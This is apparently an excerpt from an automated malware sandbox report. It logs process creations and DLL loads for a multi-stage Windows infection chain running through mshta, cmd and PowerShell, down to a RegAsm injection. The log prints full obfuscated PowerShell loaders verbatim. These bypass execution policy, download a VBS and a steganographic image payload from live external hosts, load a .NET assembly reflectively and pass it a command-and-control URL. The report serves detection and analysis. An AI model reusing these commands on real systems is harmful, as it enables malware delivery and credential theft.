                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES781D.tmp" "c:\Users\user\AppData\Local\Temp\nnmswnbn\CSC2F3646BAED0D4162AB721EA9AB40E2EA.TMP"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB635.tmp" "c:\Users\user\AppData\Local\Temp\op4j5mgw\CSC61FD86854EBB47F380D5789CC9CFF7A.TMP"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rqgexaaqlwosdbspgszm"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tkloyslrzegxfpgbpcmonko"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\emrhylvlvnykqvcfgfgpxwbgnd"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
